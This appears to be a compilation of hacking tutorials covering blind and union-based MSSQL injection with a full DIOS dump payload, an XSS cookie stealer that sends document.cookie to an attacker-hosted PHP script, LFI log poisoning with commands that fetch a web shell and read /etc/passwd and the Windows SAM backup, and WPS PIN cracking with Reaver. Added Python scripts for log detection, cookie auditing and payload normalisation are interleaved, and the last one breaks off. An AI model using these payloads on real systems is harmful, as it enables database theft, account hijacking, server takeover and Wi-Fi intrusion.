Mssql Blind Sql Injection Tutorial Step By Step !

In this tutorial you will learn how to perform and exploit blind MSSQL SQL injection manually, step by step. So,

What is Blind Mssql SQL Injection?

Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true-or-false questions and determines the answer from the application's response. This attack is often used when the web application is configured to show generic error messages but has not fixed the code that is vulnerable to SQL injection.

In some cases normal SQL injection does not work. Blind SQL injection is another method which may help. The important point for blind SQL injection is the difference between a valid and an invalid query result: you inject a statement that makes the query valid or invalid and observe the response.

How To Test Mssql Blind SQL Injection Vulnerable Sites?

Let us assume that http://www.example.com/page.asp?id=1 is the normal URL of the website. So let's check the website for the vulnerability by using true and false conditions like 1=2, 1=1, or 0>1.

http://www.example.com/page.asp?id=1 and 1=1  (True)
http://www.example.com/page.asp?id=1 and 1=2  (False)
http://www.example.com/page.asp?id=1 and 0>1  (False)

If the results from these requests differ, that is a good signal for you: the website is vulnerable to blind MSSQL SQL injection. When you put "id=1 and 1=1", the condition is true, so the response must be normal. But the parameter "id=1 and 1=2" makes the condition false, and if the webmaster does not provide a proper filter, the response will clearly differ from the previous one.

Extracting data through Blind Mssql SQL Injection

By using blind MSSQL SQL injection you can extract the database, but you have to spend more time on it: each sequence of queries yields only one character of a word.

Let me explain with an example of querying the first character of the database name. We assume that the database name is member; therefore the first character is "m", whose ASCII value is 109. (At this point, we assume that you know ASCII codes.)

OK, first, we have to know that the results from the requests take only two forms: valid or invalid.

The following steps are up to each person; your idea of which ASCII values to test may differ from ours.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

In this situation the result will be a valid query result, like http://www.example.com/page.asp?id=1 and 1=1 (because the first character of the database name is "m", whose ASCII code 109 is greater than 90). Then we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

Surely the result will be like http://www.example.com/page.asp?id=1 and 1=2 (because 109 is less than 120).
Then we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

The result is a valid query result, so at this point the ASCII value of the first character of the database name is between 105 and 120.
So we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result

You see that the first character of the database name has an ASCII value greater than 108
but not greater than 109. Thus we can conclude that the ASCII value equals 109.

You can prove with:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

We are sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1

What remains is to manipulate some queries to collect the information you want.
In this tutorial we propose some example queries to find the names of tables and columns in the database.

Extracting table names through Blind Mssql SQL Injection

To get a table name, we can use the above method to obtain each character of the table name. The only thing we have to do is change the query to retrieve a table name from the current database. As MSSQL does not have a LIMIT command, the query is a bit complicated.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)>97

The above query is used to determine the first character of the first table in the current database. If we want to find the second character of the first table, we can do so with the following request:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97

We change the second parameter of the SUBSTRING function from 1 to 2 to specify the position of the character in the table name.
Thus, to determine other positions, we only need to change the second parameter of the SUBSTRING function.

For other tables, we can find the other table names by changing the second SELECT
from "SELECT TOP 1" to "SELECT TOP 2", "SELECT TOP 3" and so on. For example,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97

Extracting column names through Blind Mssql SQL Injection

After we obtain the table names, the next target is obviously the column names.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

To circumvent magic-quote filtering, you have to change 'tablename' into a concatenation of char() calls. For example, if the table name is 'user', when we put 'user' in the query the ' may be filtered and our query will be wrong. The solution is to convert 'user' into char(117)+char(115)+char(101)+char(114). So the WHERE clause changes from "WHERE name='user'" to "WHERE name=char(117)+char(115)+char(101)+char(114)".

In this way we can circumvent magic-quote filtering. The result from the above request is the first character of the first column name of the given table.
When we want to find the second character of the first column, we use the same method as for the table name, by changing the second parameter of the SUBSTRING function.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

The above request determines the second character of the first column name in the given table.
To determine other columns, change the p.x value from 1 to 2, 3, 4 and so on. For example,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

The first character of the second column name in the given table can be determined by the above request.
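From the defender's side, the probing described above leaves a very recognisable trail: one client sends the tautology pair and then a run of near-identical requests to the same parameter that differ only in the ISNULL(ASCII(SUBSTRING(...)))>N threshold. The following Python script is an added detection example, not part of the original tutorial; it assumes a simple access-log layout (client IP, quoted request line, status code) and the log lines are constructed.

```python
"""Detect boolean-based blind SQL injection probing in web server logs.

Added example, not code from the original tutorial. The log lines below are
constructed; the assumed layout is: client IP, then the request line in
quotes (method, percent-encoded target, protocol), then the status code.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Two probe shapes from the tutorial: the tautology pair (and 1=1 / and 1=2 /
# and 0>1) and the ISNULL(ASCII(SUBSTRING(...)),0)>N character comparison that
# is repeated with a moving threshold to binary-search one character at a time.
TAUTOLOGY = re.compile(r"\b(?:and|or)\s+\d+\s*[=<>]+\s*\d+\b", re.I)
CHAR_PROBE = re.compile(
    r"isnull\s*\(\s*ascii\s*\(\s*substring\s*\(.*?\)\s*,\s*0\s*\)\s*([=<>])\s*(\d+)",
    re.I | re.S,
)
LOG_LINE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Split one log line into (ip, path, {param: decoded value}, status)."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes values, so the SQL reads as the server saw it.
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return ip, parts.path, params, int(status)


def classify(value):
    """Return ('char_probe', threshold), ('tautology', None) or None."""
    m = CHAR_PROBE.search(value)
    if m:
        return "char_probe", int(m.group(2))
    if TAUTOLOGY.search(value):
        return "tautology", None
    return None


def analyze(lines, min_char_probes=3, min_tautology=2):
    """Group probes per (ip, path, parameter) and report clients that look like
    they are walking a blind injection: several tautology requests, or a run
    of ASCII comparisons against the same parameter."""
    stats = defaultdict(lambda: {"tautology": 0, "char_probe": 0, "thresholds": []})
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path, params, _status = parsed
        for name, value in params.items():
            hit = classify(value)
            if not hit:
                continue
            kind, threshold = hit
            entry = stats[(ip, path, name)]
            entry[kind] += 1
            if threshold is not None:
                entry["thresholds"].append(threshold)
    findings = []
    for (ip, path, name), entry in stats.items():
        if entry["char_probe"] >= min_char_probes or entry["tautology"] >= min_tautology:
            findings.append({"ip": ip, "path": path, "param": name,
                             "tautology_probes": entry["tautology"],
                             "char_probes": entry["char_probe"],
                             "thresholds": entry["thresholds"]})
    return findings


# Constructed sample: one client replays the tutorial's probe sequence against
# id=, another client browses normally.
_PROBE = ("1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))"
          "AS%20varchar(8000)),1,1)),0)")
SAMPLE_LOG = [
    '203.0.113.5 "GET /page.asp?id=1 HTTP/1.1" 200',
    '203.0.113.5 "GET /page.asp?id=1%20and%201=1 HTTP/1.1" 200',
    '203.0.113.5 "GET /page.asp?id=1%20and%201=2 HTTP/1.1" 200',
    '203.0.113.5 "GET /page.asp?id=1%20and%200%3E1 HTTP/1.1" 200',
] + [f'203.0.113.5 "GET /page.asp?id={_PROBE}%3E{n} HTTP/1.1" 200'
     for n in (90, 120, 105, 112, 108, 110, 109)] + [
    f'203.0.113.5 "GET /page.asp?id={_PROBE}=109 HTTP/1.1" 200',
    '198.51.100.7 "GET /page.asp?id=7 HTTP/1.1" 200',
    '198.51.100.7 "GET /contact.asp HTTP/1.1" 200',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The thresholds list in a finding reproduces the search path (90, 120, 105, 112, ...), which is useful evidence when escalating the alert.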

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Hello guys, in this post I will show you cookie stealing via a cross-site scripting (XSS) attack: how an attacker can steal cookies from users. I hope you are familiar with XSS; if not, please read our basic XSS tutorial.

Prerequisites:

  • A cookie stealer script: get it from here
  • Free web hosting.
  • Basic knowledge of XSS attacks.

Cookie stealing is the process in which an attacker exploits an XSS vulnerability and steals the cookies of victims who visit the infected link. These cookies will be used to compromise their accounts.

Creating PHP Cookie Stealer

  • Copy the cookie stealer code from here.
  • Open Notepad or any editor and paste the code.
  • Save the file with a .php extension, e.g. xss.php

Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name used in the PHP file.
Now we have two files:
  1) xss.php
  2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both files. For hosting you can use free web hosting or secure tunnelling. After hosting, the stealer will be at: www.domain.com/xss.php

Now that everything is set up, we have to find a vulnerable website into which to inject our malicious code.

<script>location.href = 'http://www.site.com/xss.php?cookie='+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code into a site vulnerable to persistent XSS, it stays there until the admin finds it and is shown to all users, so attackers don't need to send any link. Whoever visits the page becomes a victim.

Reflected: in the non-persistent case, the attacker sends the link to victims. Whenever they follow the link, it steals their cookie. Most sites are vulnerable to reflected XSS.

In the reflected case, attackers send the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly shows the script. An attacker can URL-encode the script and shorten the link with a URL-shortening service like TinyURL, then send it to the victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim opens the link, his/her cookie will be stored in the log.txt file.
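The whole attack depends on document.cookie being able to read the session cookie, so the first thing to check on the defending side is how the application sets its cookies. The Python script below is an added example, not code from the original post; it audits Set-Cookie headers for HttpOnly, Secure and SameSite and reports which cookie names the injected script above would actually be able to send to log.txt. The response headers are constructed.

```python
"""Audit Set-Cookie headers against the cookie theft described above.

Added example, not code from the original post. The response headers are
constructed. The injected script reads document.cookie, which only exposes
cookies set without HttpOnly, so the audit reports which cookie names such a
script would be able to exfiltrate and which protective attributes are missing.
"""


def parse_set_cookie(header_value):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header_value, session_names=("phpsessid", "asp.net_sessionid", "jsessionid")):
    """Return {'name': ..., 'issues': [...], 'script_readable': bool} for one Set-Cookie."""
    name, _value, attrs = parse_set_cookie(header_value)
    issues = []
    script_readable = "httponly" not in attrs
    if script_readable:
        issues.append("no HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        issues.append("no Secure: sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("no SameSite=Lax/Strict: attached to cross-site requests")
    if name.lower() in session_names and script_readable:
        issues.append("session cookie exposed to script: account takeover risk")
    return {"name": name, "issues": issues, "script_readable": script_readable}


def audit_response(headers):
    """Audit every Set-Cookie header in a list of (header_name, value) pairs."""
    return [audit_cookie(value) for hname, value in headers if hname.lower() == "set-cookie"]


def exfiltratable_cookies(headers):
    """Names that a document.cookie read in the victim's browser would return,
    i.e. what the stealer's log.txt would actually receive."""
    return [r["name"] for r in audit_response(headers) if r["script_readable"]]


# Constructed sample response: a session cookie set without any protection,
# a hardened remember-me cookie, and a harmless preference cookie.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "PHPSESSID=3f9c1e2a7b; Path=/"),
    ("Set-Cookie", "remember=dXNlcjE=; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "theme=dark; Path=/; SameSite=Lax"),
]

if __name__ == "__main__":
    for result in audit_response(SAMPLE_HEADERS):
        print(result["name"], "->", result["issues"] or ["ok"])
    print("exfiltratable:", exfiltratable_cookies(SAMPLE_HEADERS))
```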

MSSQL Union Based Injection Step By Step

Today I am going to show you MSSQL union-based injection step by step. In this post I will only cover the basics. I don't see a lot of detailed tutorials on the Internet, so I am going to do what I can to help out based on my experience with MS SQL injections. First of all we need to know the basics of injecting; all the basics, including finding the type of injection, testing the database and finding the columns etc., are the same as for other databases, so I suggest you read the basics before you start here if you haven't read them yet.

So, let's start 😀

  • The checking part is the same as for MySQL: first put a single quote, then a double quote, check the error, and I came to know this one is a single-quote-based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

Remember: when both the single quote and the double quote give an error, there is a high probability that the injection is integer-based, because with a single-quote-based injection the double quote gives no error, with a double-quote-based injection the single quote gives no error, and when both give an error, apply the golden rule that the injection is integer type.

  • Now let's break and fix the query
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means total number of columns are 5.

  • Now we continue with ORDER BY and in the end we come to know that 5 is the last working column. The next part is the UNION SELECT query.
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
[Screenshot of the resulting error]

If you get this error, we have the option to use NULL.

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • Now we have to convert each column one by one to @@version or db_name(), as you will see in the video ;).
  • When we put @@version in a column, if the column is vulnerable, it shows the version something like this:
    [Screenshot of the @@version output]

There are some other ways to collect more information from MSSQL:

  1. @@version – gives the version
  2. db_name() – gives the name of the database
  3. user, system_user, current_user, user_name – give the current user.
  4. @@SERVERNAME – gives the hostname.
  • Now we will extract the table names; here the syntax is a little different from MySQL because of the lack of a LIMIT clause in MSSQL.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way, increase the TOP value. But in the video I have shown only diosing the site.
  • Now in the same manner we can extract the column names. Let's see...
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now let's dump the data from the tables and columns. Here for concatenation we can use %2b, which is '+'.
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from table_name_here --

Now we are almost done. Let's come to the diosing part.

This DIOS was created by my friends Zen and Rummy. By diosing the site we can make the whole process faster.

How to Dios the Mssql Site:

Dios

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the UNION SELECT, fix the query, then add the DIOS and execute it as shown below; for more details see the video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give an error, but it is actually creating the DIOS table, so now let's check the output under Ahmed1.

[Screenshot of the DIOS output]

  • And here we got the complete output at once. Before I finish I'd like to show you some basic errors in MSSQLi.

So here we finish MSSQL Union Based Injection. Keep practicing and learning guys..
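Both the magic-quote bypass from the blind tutorial (char(117)+char(115)+char(101)+char(114) for 'user') and the DIOS above (CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62) for '<br>') hide string literals from naive signature matching. The Python script below is an added example, not code from either post: it decodes a captured query-string value, folds CHAR() runs back into quoted literals and merges adjacent literals, so log review or WAF rules see the real strings. The sample fragments are copied from this page.

```python
"""Normalise CHAR()-concatenation evasions in captured SQL injection payloads.

Added example, not code from the original posts. Both the magic-quote bypass
(name=char(117)+char(115)+char(101)+char(114)) and the DIOS payload
(CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62) for '<br>') hide string literals from
naive signature matching; folding them back makes log review and WAF rules
see the real strings. The sample fragments are copied from this page.
"""
import re
from urllib.parse import unquote_plus

# One CHAR(n) call, and a run of them joined by the T-SQL + operator.
CHAR_CALL = r"char\s*\(\s*\d{1,3}\s*\)"
CHAR_RUN = re.compile(rf"{CHAR_CALL}(?:\s*\+\s*{CHAR_CALL})*", re.I)
# Two adjacent single-quoted literals joined by +, e.g. '<br>'+'Columns : '.
# Assumes the statement has balanced quotes (escaped quotes are '').
ADJACENT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
LITERAL = re.compile(r"'((?:[^']|'')*)'")


def decode_param(raw):
    """Decode a query-string value as the server does: '+' is a space, %2b is
    the literal plus that T-SQL uses for string concatenation."""
    return unquote_plus(raw)


def fold_char_calls(sql):
    """Replace every CHAR(n)+CHAR(m)+... run with the quoted literal it builds."""
    def to_literal(match):
        codes = re.findall(r"\d{1,3}", match.group(0))
        text = "".join(chr(int(c)) for c in codes)
        return "'" + text.replace("'", "''") + "'"
    return CHAR_RUN.sub(to_literal, sql)


def merge_literals(sql):
    """Collapse 'a'+'b' into 'ab' until nothing changes."""
    while True:
        merged = ADJACENT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", sql)
        if merged == sql:
            return merged
        sql = merged


def normalize(raw):
    """Full pipeline: percent-decode, fold CHAR() runs, merge literals."""
    return merge_literals(fold_char_calls(decode_param(raw)))


def string_literals(sql):
    """All single-quoted literals in a normalised statement, unescaped."""
    return [m.group(1).replace("''", "'") for m in LITERAL.finditer(sql)]


# Constructed inputs taken from the two payload styles on this page.
BYPASS = "Where name=char(117)%2bchar(115)%2bchar(101)%2bchar(114)"
DIOS_FRAGMENT = ("SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)"
                 "%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()")

if __name__ == "__main__":
    print(normalize(BYPASS))
    print(normalize(DIOS_FRAGMENT))
    print(string_literals(normalize(DIOS_FRAGMENT)))
```

A literal such as '<br>' or a known table name showing up inside a query parameter is a much more robust rule trigger than matching the raw CHAR(60) text.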

Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge. I found one of the pages vulnerable to SQL injection, injected it, extracted the admin's credentials and, as soon as I logged in to the "Admin Panel", I found a page vulnerable to LFI.
So I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that, but they weren't working/there. 🙁

The only thing I didn't try was LFI log file poisoning, but it was time to unchain the beast.
I included the Apache HTTP configuration file and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script.

[Screenshot of the Apache configuration showing the piped log script]

Me likey 🙂 Then, of course, I included the bash script. These were its contents:

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
  read line
  [ -z "$line" ] && exit

  DOMAIN=""
  if [[ "$line" =~ \[host:([^\]]+) ]]; then
    DOMAIN=${BASH_REMATCH[1]}
  fi

  if [ -n "$DOMAIN" ]; then
    echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
    chown apache:apache "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
  else
    echo "${line}" >> "/var/www/html/error_${DATE}.log"
    chown apache:apache "/var/www/html/error_${DATE}.log"
  fi
done

What does this do? It creates a .log file in "/var/www/html/domain.tld/logs/" named "error_YYYY-MM-DD", and according to the Apache config it sent the URL, Referer and time to this bash script, which then saved them to the file. So I just had to visit a non-existent page (to get a 404) with my Referer set to "<?php system('wget http://x.com/y.txt -O z.php'); ?>" or any of its equivalents, and then include the .log file to execute the code 😉

curl -e '<?php system($_POST["x"]); ?>' http://domain.tld/blablabla.ext

curl --data "x=cat /etc/passwd" "http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log"

I guess we’re done here 😀

PS: after solving the challenge I found out the "official solution" was nothing like this; it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to successfully bypass that function plus other image re-sizing functions. There are various great articles written on that topic; here are some of them:

Hack WiFI Password Using Reaver Without Wordlist

In this post you will learn how to hack a WiFi password using Reaver without a wordlist.

Reaver is a tool included in Kali Linux that allows an attacker (maybe that creepy next-door neighbour of yours) to recover your router's password by attacking the WPS PIN validation process between your router and your devices. Because Reaver does not use a wordlist to brute-force your password, it does not matter how strong or long the password is: Reaver will eventually break the PIN.

Reaver tries every possible combination of 4 digits until it breaks the PIN. At that point, voilà!

To use Reaver, you need your WiFi card's interface name and the BSSID of the router you're trying to crack, and you need to confirm that the wireless network has WPS enabled. We need to do all that!

Find your wireless interface:

Inside Terminal, type: iwconfig

Press Enter. You should see a wireless device in the resulting list. Most likely it will be called:

wlan0 or wlan1

If you have more than one WiFi card, or a more unusual networking setup, it may be called something else.

Put your wireless card into monitor mode. Assuming your wireless card's interface name is wlan0,

run the following command to put your wireless card into monitor mode:

airmon-ng start wlan0

This command will print the name of the monitor-mode interface, which you'll also need to make a note of. Most likely it will be: mon0

Find the BSSID of the AP you want to hack:

Finally, you need to get the unique identifier of the router you're trying to crack so you can point Reaver in the right direction. To do this, run the following command:

airodump-ng mon0

When you see the network you want, press CTRL+C to stop the list from refreshing, then copy that network's BSSID (the sequence of letters, numbers and colons on the far left). The network should have WPA or WPA2 listed under the ENC column.

Now, with the BSSID and the monitor interface name in hand, you have everything you need to fire up Reaver.

Crack a Network’s WPA Password with Reaver

To see whether the AP you are attacking uses WPS (and is therefore susceptible to Reaver), you can check with:

wash -i mon0

Look under the LOCK column. If your target BSSID has its WPS locked (you will see "yes" under WPS Locked), then Reaver will not be able to crack the PIN. If you see "no", then continue...

Now run the following command in the Terminal.

If your monitor interface was mon0 like mine, and your BSSID was

8a:ab:9e:82:9a:c2

your command would look like:

reaver -i mon0 -b 8d:ae:9d:65:1f:b2 -vv

Reaver will now try a series of PINs against the router in a brute-force attack, one after another. In my test, Reaver took around 6 hours to crack the PIN and hand me the passphrase.

Recommended adapter for this:

Alfa AWUS036H 1000mW 1W 802.11 b/g USB Wireless WiFi network Adapter with 5dBi Antenna and Suction cup Window Mount dock – for Wardriving & Range Extension


Local File Inclusion LFI On Windows Server

In a previous post I showed you local file inclusion (LFI) on a Linux server; today in this post I will show you LFI on a Windows server. I will not start with an introduction; for the complete guide please refer to my old post.

What is Local File Inclusion LFI vulnerability?

Local file inclusion (LFI) is the inclusion of a local file available on the web server. This vulnerability occurs when user input contains the path of the file to be included. When this input is not properly sanitised, an attacker can supply the locations of some default files and read all these sensitive files.

Here is the vulnerable code.

<?php
if (isset($_GET['page']))
    include($_GET['page']);
?>

Here we can see that the script doesn't check which file is to be included, so we are free to include any file by changing the value of the 'page' GET variable.

Finding a Local File Inclusion LFI vulnerability in a website

Now we are going to find a local file inclusion in a website. Say we found a website; let's check whether it is vulnerable or not.

www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

Now after requesting this page we get an error, so there is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

In Linux we include /etc/passwd, but on a Windows server we include /windows/repair/sam; this repair/sam is the backup SAM file.

http://localhost/test.php?page=../../windows/repair/sam

If it is not found, you will have to move up directories using ../

So, as you all know, with local file inclusion an attacker can include sensitive files. Now let us shell the web server.

For this we will send an error containing PHP code to the web server logs.

<?php passthru($_GET['cmd']); ?>

You can also exploit it using system(), exec(), shell_exec() etc. These functions are offered by PHP to execute system-level commands.

Here I am going to use telnet to inject the malicious code into the log files as an error.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

This script is now saved on the web server, and we have to include it.

http://localhost/test.php?page=../logs/access.log&cmd=dir

Now you can do anything here after including the log file, and execute system-level commands, like:

http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir
http://localhost/test.php?page=../logs/access.log&cmd=wget

Now you can wget a shell and download it onto the web server.

Hope you enjoyed this session and learned something. Thanks for reading guys, keep learning 😉
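Both LFI posts on this page (the log-poisoning write-up and the Windows one above) start from the same root cause: include($_GET['page']) with no check at all. The Python function below is an added example, not code from either post; it shows the two controls a hardened include needs, an allowlist of view names where one is configured, and otherwise canonicalisation plus a containment check against the web root and a .php-only rule, and runs the traversal strings from both posts through it. The web root used by run_cases() is a temporary directory created for the demonstration.

```python
"""Resolve a user-supplied page name the way a hardened include should.

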